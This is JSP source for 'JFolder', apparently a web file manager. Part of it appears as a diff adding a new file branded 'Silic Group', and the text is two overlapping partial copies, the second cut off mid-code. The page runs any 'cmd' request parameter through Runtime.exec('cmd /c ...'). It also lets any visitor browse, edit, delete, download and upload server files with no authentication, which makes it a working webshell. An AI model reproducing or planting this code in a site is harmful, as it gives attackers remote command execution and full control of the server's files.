String formatPath(String p)
{
StringBuffer sb=new StringBuffer();
for (int i = 0; i < p.length(); i++)
{
if(p.charAt(i)=='\\')
{
sb.append("\\\\");
}
else
{
sb.append(p.charAt(i));
}
}
return sb.toString();
}
/**
* Converts some important chars (int) to the corresponding html string
*/
static String conv2Html(int i) {
if (i == '&') return "&amp;";
else if (i == '<') return "&lt;";
else if (i == '>') return "&gt;";
else if (i == '"') return "&quot;";
else return "" + (char) i;
}
/**
* Converts a normal string to a html conform string
*/
static String htmlEncode(String st) {
StringBuffer buf = new StringBuffer();
for (int i = 0; i < st.length(); i++) {
buf.append(conv2Html(st.charAt(i)));
}
return buf.toString();
}
String getDrivers()
/**
Windows系统上取得可用的所有逻辑盘
*/
{
StringBuffer sb=new StringBuffer(strDrivers[languageNo] + " : ");
File roots[]=File.listRoots();
for(int i=0;i<roots.length;i++)
{
sb.append(" <a href=\"javascript:doForm('','"+roots[i]+"\\','','','1','');\">");
sb.append(roots[i]+"</a>&nbsp;");
}
return sb.toString();
}
static String convertFileSize(long filesize)
{
//bug 5.09M 显示5.9M
String strUnit="Bytes";
String strAfterComma="";
int intDivisor=1;
if(filesize>=1024*1024)
{
strUnit = "MB";
intDivisor=1024*1024;
}
else if(filesize>=1024)
{
strUnit = "KB";
intDivisor=1024;
}
if(intDivisor==1) return filesize + " " + strUnit;
strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor ;
if(strAfterComma=="") strAfterComma=".0";
return filesize / intDivisor + "." + strAfterComma + " " + strUnit;
}
%>
<%
request.setCharacterEncoding("gb2312");
String tabID = request.getParameter("tabID");
String strDir = request.getParameter("path");
String strAction = request.getParameter("action");
String strFile = request.getParameter("file");
String strPath = strDir + "\\" + strFile;
String strCmd = request.getParameter("cmd");
StringBuffer sbEdit=new StringBuffer("");
StringBuffer sbDown=new StringBuffer("");
StringBuffer sbCopy=new StringBuffer("");
StringBuffer sbSaveCopy=new StringBuffer("");
StringBuffer sbNewFile=new StringBuffer("");
if((tabID==null) || tabID.equals(""))
{
tabID = "1";
}
if(strDir==null||strDir.length()<1)
{
strDir = request.getRealPath("/");
}
if(strAction!=null && strAction.equals("down"))
{
File f=new File(strPath);
if(f.length()==0)
{
sbDown.append("文件大小为 0 字节,就不用下了吧");
}
else
{
response.setHeader("content-type","text/html; charset=ISO-8859-1");
response.setContentType("APPLICATION/OCTET-STREAM");
response.setHeader("Content-Disposition","attachment; filename=\""+f.getName()+"\"");
FileInputStream fileInputStream =new FileInputStream(f.getAbsolutePath());
out.clearBuffer();
int i;
while ((i=fileInputStream.read()) != -1)
{
out.write(i);
}
fileInputStream.close();
out.close();
}
}
if(strAction!=null && strAction.equals("del"))
{
File f=new File(strPath);
f.delete();
}
if(strAction!=null && strAction.equals("edit"))
{
File f=new File(strPath);
BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(f)));
sbEdit.append("<form name='frmEdit' action='' method='POST'>\r\n");
sbEdit.append("<input type=hidden name=action value=save >\r\n");
sbEdit.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
sbEdit.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
sbEdit.append("<input type=submit name=save value=' "+strFileSave[languageNo]+" '> ");
sbEdit.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> &nbsp;"+strPath+"\r\n");
sbEdit.append("<br><textarea rows=30 cols=90 name=content>");
String line="";
while((line=br.readLine())!=null)
{
sbEdit.append(htmlEncode(line)+"\r\n");
}
sbEdit.append("</textarea>");
sbEdit.append("<input type=hidden name=path value="+strDir+">");
sbEdit.append("</form>");
}
if(strAction!=null && strAction.equals("save"))
{
File f=new File(strPath);
BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f)));
String strContent=request.getParameter("content");
bw.write(strContent);
bw.close();
}
if(strAction!=null && strAction.equals("copy"))
{
File f=new File(strPath);
sbCopy.append("<br><form name='frmCopy' action='' method='POST'>\r\n");
sbCopy.append("<input type=hidden name=action value=savecopy >\r\n");
sbCopy.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
sbCopy.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
sbCopy.append("原始文件: "+strPath+"<p>");
sbCopy.append("目标文件: <input type=text name=file2 size=40 value='"+strDir+"'><p>");
sbCopy.append("<input type=submit name=save value=' "+strFileCopy[languageNo]+" '> ");
sbCopy.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> <p>&nbsp;\r\n");
sbCopy.append("</form>");
}
if(strAction!=null && strAction.equals("savecopy"))
{
File f=new File(strPath);
String strDesFile=request.getParameter("file2");
if(strDesFile==null || strDesFile.equals(""))
{
sbSaveCopy.append("<p><font color=red>目标文件错误。</font>");
}
else
{
File f_des=new File(strDesFile);
if(f_des.isFile())
{
sbSaveCopy.append("<p><font color=red>目标文件已存在,不能复制。</font>");
}
else
{
String strTmpFile=strDesFile;
if(f_des.isDirectory())
{
if(!strDesFile.endsWith("\\"))
{
strDesFile=strDesFile+"\\";
}
strTmpFile=strDesFile+"cqq_"+strFile;
}
File f_des_copy=new File(strTmpFile);
FileInputStream in1=new FileInputStream(f);
FileOutputStream out1=new FileOutputStream(f_des_copy);
byte[] buffer=new byte[1024];
int c;
while((c=in1.read(buffer))!=-1)
{
out1.write(buffer,0,c);
}
in1.close();
out1.close();
sbSaveCopy.append("原始文件 "+strPath+"<p>");
sbSaveCopy.append("目标文件 "+strTmpFile+"<p>");
sbSaveCopy.append("<font color=red>复制成功!</font>");
}
}
sbSaveCopy.append("<p><input type=button name=saveCopyBack onclick='history.back(-2);' value=返回>");
}
if(strAction!=null && strAction.equals("newFile"))
{
String strF=request.getParameter("fileName");
String strType1=request.getParameter("btnNewFile");
String strType2=request.getParameter("btnNewDir");
String strType="";
if(strType1==null)
{
strType="Dir";
}
else if(strType2==null)
{
strType="File";
}
if(!strType.equals("") && !(strF==null || strF.equals("")))
{
File f_new=new File(strF);
if(strType.equals("File") && !f_new.createNewFile())
sbNewFile.append(strF+" 文件创建失败");
if(strType.equals("Dir") && !f_new.mkdirs())
sbNewFile.append(strF+" 目录创建失败");
}
else
{
sbNewFile.append("<p><font color=red>建立文件或目录出错。</font>");
}
}
if((request.getContentType()!= null) && (request.getContentType().toLowerCase().startsWith("multipart")))
{
String tempdir=".";
boolean error=false;
response.setContentType("text/html");
sbNewFile.append("<p><font color=red>建立文件或目录出错。</font>");
HttpMultiPartParser parser = new HttpMultiPartParser();
int bstart = request.getContentType().lastIndexOf("oundary=");
String bound = request.getContentType().substring(bstart + 8);
int clength = request.getContentLength();
Hashtable ht = parser.processData(request.getInputStream(), bound, tempdir, clength);
if (ht.get("cqqUploadFile") != null)
{
FileInfo fi = (FileInfo) ht.get("cqqUploadFile");
File f1 = fi.file;
UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
if (info != null && info.aborted)
{
f1.delete();
request.setAttribute("error", "Upload aborted");
}
else
{
String path = (String) ht.get("path");
if(path!=null && !path.endsWith("\\"))
path = path + "\\";
if (!f1.renameTo(new File(path + f1.getName())))
{
request.setAttribute("error", "Cannot upload file.");
error = true;
f1.delete();
}
}
}
}
%>
<html>
<head>
<style type="text/css">
td,select,input,body{font-size:9pt;}
A { TEXT-DECORATION: none }
#tablist{
padding: 5px 0;
margin-left: 0;
margin-bottom: 0;
margin-top: 0.1em;
font:9pt;
}
#tablist li{
list-style: none;
display: inline;
margin: 0;
}
#tablist li a{
padding: 3px 0.5em;
margin-left: 3px;
border: 1px solid ;
background: F6F6F6;
}
#tablist li a:link, #tablist li a:visited{
color: navy;
}
#tablist li a.current{
background: #EAEAFF;
}
#tabcontentcontainer{
width: 100%;
padding: 5px;
border: 1px solid black;
}
.tabcontent{
display:none;
}
</style>
<script type="text/javascript">
var initialtab=[<%=tabID%>, "menu<%=tabID%>"]
////////Stop editting////////////////
function cascadedstyle(el, cssproperty, csspropertyNS){
if (el.currentStyle)
return el.currentStyle[cssproperty]
else if (window.getComputedStyle){
var elstyle=window.getComputedStyle(el, "")
return elstyle.getPropertyValue(csspropertyNS)
}
}
var previoustab=""
function expandcontent(cid, aobject){
if (document.getElementById){
highlighttab(aobject)
if (previoustab!="")
document.getElementById(previoustab).style.display="none"
document.getElementById(cid).style.display="block"
previoustab=cid
if (aobject.blur)
aobject.blur()
return false
}
else
return true
}
function highlighttab(aobject){
if (typeof tabobjlinks=="undefined")
collecttablinks()
for (i=0; i<tabobjlinks.length; i++)
tabobjlinks[i].style.backgroundColor=initTabcolor
var themecolor=aobject.getAttribute("theme")? aobject.getAttribute("theme") : initTabpostcolor
aobject.style.backgroundColor=document.getElementById("tabcontentcontainer").style.backgroundColor=themecolor
}
function collecttablinks(){
var tabobj=document.getElementById("tablist")
tabobjlinks=tabobj.getElementsByTagName("A")
}
function do_onload(){
collecttablinks()
initTabcolor=cascadedstyle(tabobjlinks[1], "backgroundColor", "background-color")
initTabpostcolor=cascadedstyle(tabobjlinks[0], "backgroundColor", "background-color")
expandcontent(initialtab[1], tabobjlinks[initialtab[0]-1])
}
if (window.addEventListener)
window.addEventListener("load", do_onload, false)
else if (window.attachEvent)
window.attachEvent("onload", do_onload)
else if (document.getElementById)
window.onload=do_onload
</script>
<script language="javascript">
function doForm(action,path,file,cmd,tab,content)
{
document.frmCqq.action.value=action;
document.frmCqq.path.value=path;
document.frmCqq.file.value=file;
document.frmCqq.cmd.value=cmd;
document.frmCqq.tabID.value=tab;
document.frmCqq.content.value=content;
if(action=="del")
{
if(confirm("确定要删除文件 "+file+" 吗?"))
document.frmCqq.submit();
}
else
{
document.frmCqq.submit();
}
}
</script>
<title>JFoler 0.9 ---A jsp based web folder management tool by Steven Cee</title>
<head>
<body>
<form name="frmCqq" method="post" action="">
<input type="hidden" name="action" value="">
<input type="hidden" name="path" value="">
<input type="hidden" name="file" value="">
<input type="hidden" name="cmd" value="">
<input type="hidden" name="tabID" value="2">
<input type="hidden" name="content" value="">
</form>
<!--Top Menu Started-->
<ul id="tablist">
<li><a href="http://www.smallrain.net" class="current" onClick="return expandcontent('menu1', this)"> <%=strFileManage[languageNo]%> </a></li>
<li><a href="new.htm" onClick="return expandcontent('menu2', this)" theme="#EAEAFF"> <%=strCommand[languageNo]%> </a></li>
<li><a href="hot.htm" onClick="return expandcontent('menu3', this)" theme="#EAEAFF"> <%=strSysProperty[languageNo]%> </a></li>
<li><a href="search.htm" onClick="return expandcontent('menu4', this)" theme="#EAEAFF"> <%=strHelp[languageNo]%> </a></li>
&nbsp; <%=authorInfo[languageNo]%>
</ul>
<!--Top Menu End-->
<%
StringBuffer sbFolder=new StringBuffer("");
StringBuffer sbFile=new StringBuffer("");
try
{
File objFile = new File(strDir);
File list[] = objFile.listFiles();
if(objFile.getAbsolutePath().length()>3)
{
sbFolder.append("<tr><td >&nbsp;</td><td><a href=\"javascript:doForm('','"+formatPath(objFile.getParentFile().getAbsolutePath())+"','','"+strCmd+"','1','');\">");
sbFolder.append(strParentFolder[languageNo]+"</a><br>- - - - - - - - - - - </td></tr>\r\n ");
}
for(int i=0;i<list.length;i++)
{
if(list[i].isDirectory())
{
sbFolder.append("<tr><td >&nbsp;</td><td>");
sbFolder.append(" <a href=\"javascript:doForm('','"+formatPath(list[i].getAbsolutePath())+"','','"+strCmd+"','1','');\">");
sbFolder.append(list[i].getName()+"</a><br></td></tr> ");
}
else
{
String strLen="";
String strDT="";
long lFile=0;
lFile=list[i].length();
strLen = convertFileSize(lFile);
Date dt=new Date(list[i].lastModified());
strDT=dt.toLocaleString();
sbFile.append("<tr onmouseover=\"this.style.backgroundColor='#FBFFC6'\" onmouseout=\"this.style.backgroundColor='white'\"><td>");
sbFile.append(""+list[i].getName());
sbFile.append("</td><td>");
sbFile.append(""+strLen);
sbFile.append("</td><td>");
sbFile.append(""+strDT);
sbFile.append("</td><td>");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('edit','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileEdit[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('del','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileDel[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('down','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileDown[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('copy','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileCopy[languageNo]+"</a> ");
}
}
}
catch(Exception e)
{
out.println("<font color=red>操作失败: "+e.toString()+"</font>");
}
%>
<DIV id="tabcontentcontainer">
<div id="menu3" class="tabcontent">
<br>
<br> &nbsp;&nbsp; 未完成
<br>
<br>&nbsp;
</div>
<div id="menu4" class="tabcontent">
<br>
<p>一、功能说明</p>
<p>&nbsp;&nbsp;&nbsp; jsp 版本的文件管理器,通过该程序可以远程管理服务器上的文件系统,您可以新建、修改、</p>
<p>删除、下载文件和目录。对于windows系统还提供了命令行窗口的功能可以运行一些程序类似</p>
<p>与windows的cmd。</p>
<p>&nbsp;</p>
<p>二、测试</p>
<p>&nbsp;&nbsp;&nbsp;<b>请大家在使用过程中,有任何问题,意见或者建议都可以给我留言,以便使这个程序更加完善和稳定,<p>
留言地址为:<a href="http://blog.csdn.net/cqq/archive/2004/11/14/181728.aspx" target="_blank">http://blog.csdn.net/cqq/archive/2004/11/14/181728.aspx</a></b>
<p>&nbsp;</p>
<p>三、更新记录</p>
<p>&nbsp;&nbsp;&nbsp; 2004.11.15&nbsp; V0.9测试版发布,增加了一些基本的功能,文件编辑、复制、删除、下载、上传以及新建文件目录功能</p>
<p>&nbsp;&nbsp;&nbsp; 2004.10.27&nbsp; 暂时定为0.6版吧, 提供了目录文件浏览功能 和 cmd功能</p>
<p>&nbsp;&nbsp;&nbsp; 2004.09.20&nbsp; 第一个jsp&nbsp;程序就是这个简单的显示目录文件的小程序</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
</div>
<div id="menu1" class="tabcontent">
<%
out.println("<table border='1' width='100%' bgcolor='#FBFFC6' cellspacing=0 cellpadding=5 bordercolorlight=#000000 bordercolordark=#FFFFFF><tr><td width='30%'>"+strCurrentFolder[languageNo]+" <b>"+strDir+"</b></td><td>" + getDrivers() + "</td></tr></table><br>\r\n");
%>
<table width="100%" border="1" cellspacing="0" cellpadding="5" bordercolorlight="#000000" bordercolordark="#FFFFFF">
<tr>
<td width="25%" align="center" valign="top">
<table width="98%" border="0" cellspacing="0" cellpadding="3">
<%=sbFolder%>
</tr>
</table>
</td>
<td width="81%" align="left" valign="top">
<%
if(strAction!=null && strAction.equals("edit"))
{
out.println(sbEdit.toString());
}
else if(strAction!=null && strAction.equals("copy"))
{
out.println(sbCopy.toString());
}
else if(strAction!=null && strAction.equals("down"))
{
out.println(sbDown.toString());
}
else if(strAction!=null && strAction.equals("savecopy"))
{
out.println(sbSaveCopy.toString());
}
else if(strAction!=null && strAction.equals("newFile") && !sbNewFile.toString().equals(""))
{
out.println(sbNewFile.toString());
}
else
{
%>
<span id="EditBox"><table width="98%" border="1" cellspacing="1" cellpadding="4" bordercolorlight="#cccccc" bordercolordark="#FFFFFF" bgcolor="white" >
<tr bgcolor="#E7e7e6">
<td width="26%"><%=strFileName[languageNo]%></td>
<td width="19%"><%=strFileSize[languageNo]%></td>
<td width="29%"><%=strLastModified[languageNo]%></td>
<td width="26%"><%=strFileOperation[languageNo]%></td>
</tr>
<%=sbFile%>
<!-- <tr align="center">
<td colspan="4"><br>
总计文件个数:<font color="#FF0000">30</font> ,大小:<font color="#FF0000">664.9</font>
KB </td>
</tr>
-->
</table>
</span>
<%
}
%>
</td>
</tr>
<form name="frmMake" action="" method="post">
<tr><td colspan=2 bgcolor=#FBFFC6>
<input type="hidden" name="action" value="newFile">
<input type="hidden" name="path" value="<%=strDir%>">
<input type="hidden" name="file" value="<%=strFile%>">
<input type="hidden" name="cmd" value="<%=strCmd%>">
<input type="hidden" name="tabID" value="1">
<input type="hidden" name="content" value="">
<%
if(!strDir.endsWith("\\"))
strDir = strDir + "\\";
%>
<input type="text" name="fileName" size=36 value="<%=strDir%>">
<input type="submit" name="btnNewFile" value="新建文件" onclick="frmMake.submit()" >
<input type="submit" name="btnNewDir" value="新建目录" onclick="frmMake.submit()" >
</form>
<form name="frmUpload" enctype="multipart/form-data" action="" method="post">
<input type="hidden" name="action" value="upload">
<input type="hidden" name="path" value="<%=strDir%>">
<input type="hidden" name="file" value="<%=strFile%>">
<input type="hidden" name="cmd" value="<%=strCmd%>">
<input type="hidden" name="tabID" value="1">
<input type="hidden" name="content" value="">
<input type="file" name="cqqUploadFile" size="36">
<input type="submit" name="submit" value="上传">
</td></tr></form>
</table>
</div>
<div id="menu2" class="tabcontent">
<%
String line="";
StringBuffer sbCmd=new StringBuffer("");
if(strCmd!=null)
{
try
{
//out.println(strCmd);
Process p=Runtime.getRuntime().exec("cmd /c "+strCmd);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line=br.readLine())!=null)
{
sbCmd.append(line+"\r\n");
}
}
catch(Exception e)
{
System.out.println(e.toString());
}
}
else
{
strCmd = "set";
}
%>
<form name="cmd" action="" method="post">
&nbsp;
<input type="text" name="cmd" value="<%=strCmd%>" size=50>
<input type="hidden" name="tabID" value="2">
<input type=submit name=submit value="<%=strExecute[languageNo]%>">
</form>
<%
if(sbCmd!=null && sbCmd.toString().trim().equals("")==false)
{
%>
&nbsp;<TEXTAREA NAME="cqq" ROWS="20" COLS="100%"><%=sbCmd.toString()%></TEXTAREA>
<br>&nbsp;
<%
}
%>
</DIV>
</div>
<br><br>
<center><a href="http://www.topronet.com" target="_blank">www.topronet.com</a> ,All Rights Reserved.
<br>Any question, please email me cqq1978@Gmail.com


@ -0,0 +1,844 @@
<%@ page contentType="text/html;charset=gb2312"%>
<%@page import="java.io.*,java.util.*,java.net.*" %>
<%!
private final static int languageNo=0;
String strThisFile="JFolder.jsp";
String[] authorInfo={"<font color=red>Silic Group</font>"};
String[] strFileManage = {"文 件 管 理","File Management"};
String[] strCommand = {"CMD 命 令","Command Window"};
String[] strSysProperty = {"系 统 属 性","System Property"};
String[] strHelp = {"帮 助","Help"};
String[] strParentFolder = {"上级目录","Parent Folder"};
String[] strCurrentFolder= {"当前目录","Current Folder"};
String[] strDrivers = {"驱动器","Drivers"};
String[] strFileName = {"文件名称","File Name"};
String[] strFileSize = {"文件大小","File Size"};
String[] strLastModified = {"最后修改","Last Modified"};
String[] strFileOperation= {"文件操作","Operations"};
String[] strFileEdit = {"修改","Edit"};
String[] strFileDown = {"下载","Download"};
String[] strFileCopy = {"复制","Move"};
String[] strFileDel = {"删除","Delete"};
String[] strExecute = {"执行","Execute"};
String[] strBack = {"返回","Back"};
String[] strFileSave = {"保存","Save"};
public class FileHandler
{
private String strAction="";
private String strFile="";
void FileHandler(String action,String f)
{
}
}
public static class UploadMonitor {
static Hashtable uploadTable = new Hashtable();
static void set(String fName, UplInfo info) {
uploadTable.put(fName, info);
}
static void remove(String fName) {
uploadTable.remove(fName);
}
static UplInfo getInfo(String fName) {
UplInfo info = (UplInfo) uploadTable.get(fName);
return info;
}
}
public class UplInfo {
public long totalSize;
public long currSize;
public long starttime;
public boolean aborted;
public UplInfo() {
totalSize = 0l;
currSize = 0l;
starttime = System.currentTimeMillis();
aborted = false;
}
public UplInfo(int size) {
totalSize = size;
currSize = 0;
starttime = System.currentTimeMillis();
aborted = false;
}
public String getUprate() {
long time = System.currentTimeMillis() - starttime;
if (time != 0) {
long uprate = currSize * 1000 / time;
return convertFileSize(uprate) + "/s";
}
else return "n/a";
}
public int getPercent() {
if (totalSize == 0) return 0;
else return (int) (currSize * 100 / totalSize);
}
public String getTimeElapsed() {
long time = (System.currentTimeMillis() - starttime) / 1000l;
if (time - 60l >= 0){
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
else return time / 60 + ":0" + (time % 60) + "m";
}
else return time<10 ? "0" + time + "s": time + "s";
}
public String getTimeEstimated() {
if (currSize == 0) return "n/a";
long time = System.currentTimeMillis() - starttime;
time = totalSize * time / currSize;
time /= 1000l;
if (time - 60l >= 0){
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
else return time / 60 + ":0" + (time % 60) + "m";
}
else return time<10 ? "0" + time + "s": time + "s";
}
}
public class FileInfo {
public String name = null, clientFileName = null, fileContentType = null;
private byte[] fileContents = null;
public File file = null;
public StringBuffer sb = new StringBuffer(100);
public void setFileContents(byte[] aByteArray) {
fileContents = new byte[aByteArray.length];
System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
}
}
public class HttpMultiPartParser {
private final String lineSeparator = System.getProperty("line.separator", "\n");
private final int ONE_MB = 1024 * 1;
public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
int clength) throws IllegalArgumentException, IOException {
if (is == null) throw new IllegalArgumentException("InputStream");
if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
"\"" + boundary + "\" is an illegal boundary indicator");
boundary = "--" + boundary;
StringTokenizer stLine = null, stFields = null;
FileInfo fileInfo = null;
Hashtable dataTable = new Hashtable(5);
String line = null, field = null, paramName = null;
boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
boolean isFile = false;
if (saveFiles) { // Create the required directory (including parent dirs)
File f = new File(saveInDir);
f.mkdirs();
}
line = getLine(is);
if (line == null || !line.startsWith(boundary)) throw new IOException(
"Boundary not found; boundary = " + boundary + ", line = " + line);
while (line != null) {
if (line == null || !line.startsWith(boundary)) return dataTable;
line = getLine(is);
if (line == null) return dataTable;
stLine = new StringTokenizer(line, ";\r\n");
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in second line");
line = stLine.nextToken().toLowerCase();
if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
"Bad data in second line");
stFields = new StringTokenizer(stLine.nextToken(), "=\"");
if (stFields.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in second line");
fileInfo = new FileInfo();
stFields.nextToken();
paramName = stFields.nextToken();
isFile = false;
if (stLine.hasMoreTokens()) {
field = stLine.nextToken();
stFields = new StringTokenizer(field, "=\"");
if (stFields.countTokens() > 1) {
if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
fileInfo.name = paramName;
String value = stFields.nextToken();
if (value != null && value.trim().length() > 0) {
fileInfo.clientFileName = value;
isFile = true;
}
else {
line = getLine(is); // Skip "Content-Type:" line
line = getLine(is); // Skip blank line
line = getLine(is); // Skip blank line
line = getLine(is); // Position to boundary line
continue;
}
}
}
else if (field.toLowerCase().indexOf("filename") >= 0) {
line = getLine(is); // Skip "Content-Type:" line
line = getLine(is); // Skip blank line
line = getLine(is); // Skip blank line
line = getLine(is); // Position to boundary line
continue;
}
}
boolean skipBlankLine = true;
if (isFile) {
line = getLine(is);
if (line == null) return dataTable;
if (line.trim().length() < 1) skipBlankLine = false;
else {
stLine = new StringTokenizer(line, ": ");
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in third line");
stLine.nextToken(); // Content-Type
fileInfo.fileContentType = stLine.nextToken();
}
}
if (skipBlankLine) {
line = getLine(is);
if (line == null) return dataTable;
}
if (!isFile) {
line = getLine(is);
if (line == null) return dataTable;
dataTable.put(paramName, line);
// If parameter is dir, change saveInDir to dir
if (paramName.equals("dir")) saveInDir = line;
line = getLine(is);
continue;
}
try {
UplInfo uplInfo = new UplInfo(clength);
UploadMonitor.set(fileInfo.clientFileName, uplInfo);
OutputStream os = null;
String path = null;
if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
fileInfo.clientFileName));
else os = new ByteArrayOutputStream(ONE_MB);
boolean readingContent = true;
byte previousLine[] = new byte[2 * ONE_MB];
byte temp[] = null;
byte currentLine[] = new byte[2 * ONE_MB];
int read, read3;
if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
line = null;
break;
}
while (readingContent) {
if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
line = null;
uplInfo.aborted = true;
break;
}
if (compareBoundary(boundary, currentLine)) {
os.write(previousLine, 0, read - 2);
line = new String(currentLine, 0, read3);
break;
}
else {
os.write(previousLine, 0, read);
uplInfo.currSize += read;
temp = currentLine;
currentLine = previousLine;
previousLine = temp;
read = read3;
}//end else
}//end while
os.flush();
os.close();
if (!saveFiles) {
ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
fileInfo.setFileContents(baos.toByteArray());
}
else fileInfo.file = new File(path);
dataTable.put(paramName, fileInfo);
uplInfo.currSize = uplInfo.totalSize;
}//end try
catch (IOException e) {
throw e;
}
}
return dataTable;
}
private boolean compareBoundary(String boundary, byte ba[]) {
byte b;
if (boundary == null || ba == null) return false;
for (int i = 0; i < boundary.length(); i++)
if ((byte) boundary.charAt(i) != ba[i]) return false;
return true;
}
private synchronized String getLine(ServletInputStream sis) throws IOException {
byte b[] = new byte[1024];
int read = sis.readLine(b, 0, b.length), index;
String line = null;
if (read != -1) {
line = new String(b, 0, read);
if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
}
return line;
}
public String getFileName(String dir, String fileName) throws IllegalArgumentException {
String path = null;
if (dir == null || fileName == null) throw new IllegalArgumentException(
"dir or fileName is null");
int index = fileName.lastIndexOf('/');
String name = null;
if (index >= 0) name = fileName.substring(index + 1);
else name = fileName;
index = name.lastIndexOf('\\');
if (index >= 0) fileName = name.substring(index + 1);
path = dir + File.separator + fileName;
if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
else return path.replace('/', File.separatorChar);
}
}
String formatPath(String p)
{
StringBuffer sb=new StringBuffer();
for (int i = 0; i < p.length(); i++)
{
if(p.charAt(i)=='\\')
{
sb.append("\\\\");
}
else
{
sb.append(p.charAt(i));
}
}
return sb.toString();
}
static String conv2Html(int i) {
if (i == '&') return "&amp;";
else if (i == '<') return "&lt;";
else if (i == '>') return "&gt;";
else if (i == '"') return "&quot;";
else return "" + (char) i;
}
static String htmlEncode(String st) {
StringBuffer buf = new StringBuffer();
for (int i = 0; i < st.length(); i++) {
buf.append(conv2Html(st.charAt(i)));
}
return buf.toString();
}
String getDrivers()
{
StringBuffer sb=new StringBuffer(strDrivers[languageNo] + " : ");
File roots[]=File.listRoots();
for(int i=0;i<roots.length;i++)
{
sb.append(" <a href=\"javascript:doForm('','"+roots[i]+"\\','','','1','');\">");
sb.append(roots[i]+"</a>&nbsp;");
}
return sb.toString();
}
static String convertFileSize(long filesize)
{
String strUnit="Bytes";
String strAfterComma="";
int intDivisor=1;
if(filesize>=1024*1024)
{
strUnit = "MB";
intDivisor=1024*1024;
}
else if(filesize>=1024)
{
strUnit = "KB";
intDivisor=1024;
}
if(intDivisor==1) return filesize + " " + strUnit;
strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor ;
if(strAfterComma=="") strAfterComma=".0";
return filesize / intDivisor + "." + strAfterComma + " " + strUnit;
}
%>
<%
request.setCharacterEncoding("gb2312");
String tabID = request.getParameter("tabID");
String strDir = request.getParameter("path");
String strAction = request.getParameter("action");
String strFile = request.getParameter("file");
String strPath = strDir + "\\" + strFile;
String strCmd = request.getParameter("cmd");
StringBuffer sbEdit=new StringBuffer("");
StringBuffer sbDown=new StringBuffer("");
StringBuffer sbCopy=new StringBuffer("");
StringBuffer sbSaveCopy=new StringBuffer("");
StringBuffer sbNewFile=new StringBuffer("");
if((tabID==null) || tabID.equals(""))
{
tabID = "1";
}
if(strDir==null||strDir.length()<1)
{
strDir = request.getRealPath("/");
}
if(strAction!=null && strAction.equals("down"))
{
File f=new File(strPath);
if(f.length()==0)
{
sbDown.append("文件大小为 0 字节,就不用下了吧");
}
else
{
response.setHeader("content-type","text/html; charset=ISO-8859-1");
response.setContentType("APPLICATION/OCTET-STREAM");
response.setHeader("Content-Disposition","attachment; filename=\""+f.getName()+"\"");
FileInputStream fileInputStream =new FileInputStream(f.getAbsolutePath());
out.clearBuffer();
int i;
while ((i=fileInputStream.read()) != -1)
{
out.write(i);
}
fileInputStream.close();
out.close();
}
}
if(strAction!=null && strAction.equals("del"))
{
File f=new File(strPath);
f.delete();
}
if(strAction!=null && strAction.equals("edit"))
{
File f=new File(strPath);
BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(f)));
sbEdit.append("<form name='frmEdit' action='' method='POST'>\r\n");
sbEdit.append("<input type=hidden name=action value=save >\r\n");
sbEdit.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
sbEdit.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
sbEdit.append("<input type=submit name=save value=' "+strFileSave[languageNo]+" '> ");
sbEdit.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> &nbsp;"+strPath+"\r\n");
sbEdit.append("<br><textarea rows=30 cols=90 name=content>");
String line="";
while((line=br.readLine())!=null)
{
sbEdit.append(htmlEncode(line)+"\r\n");
}
sbEdit.append("</textarea>");
sbEdit.append("<input type=hidden name=path value="+strDir+">");
sbEdit.append("</form>");
}
if(strAction!=null && strAction.equals("save"))
{
File f=new File(strPath);
BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f)));
String strContent=request.getParameter("content");
bw.write(strContent);
bw.close();
}
if(strAction!=null && strAction.equals("copy"))
{
File f=new File(strPath);
sbCopy.append("<br><form name='frmCopy' action='' method='POST'>\r\n");
sbCopy.append("<input type=hidden name=action value=savecopy >\r\n");
sbCopy.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
